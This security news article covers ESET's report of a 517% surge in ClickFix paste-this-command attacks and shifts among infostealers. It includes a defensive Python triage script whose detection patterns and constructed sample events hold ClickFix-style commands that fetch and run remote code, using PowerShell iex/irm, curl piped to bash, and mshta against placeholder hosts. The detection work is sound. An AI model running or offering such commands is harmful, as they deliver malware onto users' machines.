ClickFix Attacks Surge 517% in 2025


ClickFix social engineering attacks rose 517% between the second half of 2024 and the first half of 2025, according to ESET's H1 2025 Threat Report, making ClickFix the second most common attack vector in ESET telemetry after phishing. The technique accounted for nearly 8% of all attacks ESET blocked in the first half of 2025.

ClickFix relies on a fake error message, broken-page "fix" prompt, or CAPTCHA-style "verify you are human" check that instructs the victim to copy a command (typically placed on the clipboard by the page's script) and paste it into the Windows Run dialog (Win+R), a PowerShell window, or a terminal. The lure exploits users' habit of fixing problems themselves rather than calling IT. Because the victim types the command into their own session, nothing is downloaded or opened as an attachment for mail and web gateways to scan; the user's own interpreter fetches and runs the payload, so the victim compromises their own machine.

First identified by Proofpoint in March 2024, the ClickFix technique rapidly gained momentum, becoming increasingly widespread by the year’s end.

The vector is not tied to one platform: the same lure works on Windows, Linux, and macOS, with only the pasted command changed to suit PowerShell or a Unix shell. Its success has led criminals to sell builders that let other actors generate weaponized ClickFix landing pages, and as the number of ClickFix variants grows, so does the range of payloads delivered through them.
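The two paragraphs above describe the lure and the interpreters it targets; what a defender actually sees is the command the victim pasted. As an added illustration (example code written for this page, not ESET's or the article's), the Python below scores command lines from two constructed sources: process-creation events in the shape Sysmon records them (Event ID 1), and values from the per-user RunMRU registry key, which Windows writes for every command typed into the Run dialog. The indicator weights, the alert threshold, and all hostnames (reserved .invalid names) are assumptions for the example; the sample events are constructed, not real telemetry.

```python
"""Heuristic triage of ClickFix-style "paste this to fix it" command lines.

Added example for this page, not code from ESET or the article. Indicator
weights, the threshold and the .invalid hostnames are assumptions.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Interpreters ClickFix lures tell the victim to paste into (Windows and Unix-like).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh"}

# (pattern, weight, label). Weights and threshold are chosen for this example.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), 2, "encoded command"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I), 2, "remote fetch"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2, "in-memory execution"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), 3, "mshta remote HTA"),
    (re.compile(r"\|\s*(?:ba|z)?sh\b", re.I), 3, "pipe to shell"),
    # ClickFix commands often end in a comment so the Run box shows
    # "I am not a robot"-style text instead of the payload.
    (re.compile(r"I\s*am\s*not\s*a\s*robot|verif|captcha|ray\s*id", re.I), 3, "CAPTCHA lure text"),
]
SUSPICIOUS_SCORE = 4


@dataclass
class Verdict:
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: str = ""  # payload recovered from -EncodedCommand, if any


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE payload of a PowerShell -EncodedCommand argument, or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(cmdline: str) -> Verdict:
    """Score one command line; indicators are also searched in the decoded payload."""
    v = Verdict(decoded=decode_encoded_command(cmdline))
    haystack = cmdline + "\n" + v.decoded
    for pattern, weight, label in INDICATORS:
        if pattern.search(haystack):
            v.score += weight
            v.reasons.append(label)
    return v


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def triage_process_event(event: Dict[str, str]) -> Optional[Verdict]:
    """Return a Verdict for interpreter launches that reach the threshold, else None.

    explorer.exe is the parent of anything started from the Run dialog, so a
    shell spawned by it gets a small extra weight; it is never decisive alone.
    """
    if _basename(event["Image"]) not in INTERPRETERS:
        return None
    v = classify(event["CommandLine"])
    if _basename(event["ParentImage"]) == "explorer.exe":
        v.score += 1
        v.reasons.append("launched from explorer.exe")
    return v if v.score >= SUSPICIOUS_SCORE else None


def triage_runmru(values: Dict[str, str]) -> List[Tuple[str, Verdict]]:
    """Score RunMRU entries; each value is stored as 'command\\1', MRUList is the order."""
    hits = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        v = classify(cmd)
        if v.score >= SUSPICIOUS_SCORE:
            hits.append((name, v))
    return hits


# --- constructed sample data (not real telemetry) ---------------------------
ENCODED = base64.b64encode(
    "iex (irm http://cdn.example.invalid/v)".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -w hidden -enc {ENCODED} "
                    "# I am not a robot - reCAPTCHA Verification ID: 7624"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://fix.example.invalid/verify.hta"},
    {"Image": "/bin/bash",
     "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "CommandLine": 'bash -c "curl -fsSL https://update.example.invalid/fix.sh | bash"'},
    # Routine admin use that must not fire.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\inventory.ps1"},
]

SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex(irm http://cdn.example.invalid/v)"\\1',
    "MRUList": "ba",
}

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        v = triage_process_event(e)
        print(f"{_basename(e['Image']):16} {'ALERT' if v else 'ok   '}",
              ", ".join(v.reasons) if v else "")
    for name, v in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {name}: score {v.score}: {', '.join(v.reasons)}")
```

The explorer.exe parent is deliberately a weak signal, since Start-menu launches share it; the decoded payload and the lure comment carry the weight. The RunMRU key is worth collecting during triage because it persists across reboots and records exactly what the user pasted, whereas process telemetry only exists if a sensor was already recording; on macOS and Linux the shell history file plays the same role.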

Jiří Kropáč, Director of Threat Prevention Labs at ESET, remarked, “The increasing list of threats stemming from ClickFix attacks includes infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware associated with nation-state actors.”

A separate analysis by ReliaQuest indicated that ClickFix played a pivotal role in a 10% surge in detected drive-by compromises from March to May 2025.

Major Shifts in Infostealer Landscape

The ESET report also recorded significant shifts among infostealers in the first half of 2025, most notably the rise of SnakeStealer, which became the most frequently detected infostealer in the period, accounting for roughly one in five infostealer detections in ESET's telemetry.

Active since 2019, SnakeStealer logs keystrokes, steals stored credentials, captures screenshots, and harvests clipboard contents. Its growth coincides with a sharp drop in Agent Tesla activity, whose detections fell 57% compared with the previous six months. ESET attributes the decline to Agent Tesla's operators losing access to the servers hosting its source code; the malware has not disappeared, but no new versions are being developed.

May 2025 also brought major law enforcement action against infostealer infrastructure, which is likely to reshape the landscape further. The disruption of Lumma Stealer's infrastructure led to the seizure of around 2,300 domains, and shortly afterwards the U.S. Department of Justice, acting as part of the Europol-coordinated Operation Endgame, took down a large part of Danabot's infrastructure.

Prior to these disruptions, Lumma Stealer’s activity in the first half of 2025 had risen by 21% compared to the latter half of 2024, while Danabot activity surged even higher, climbing by 52%.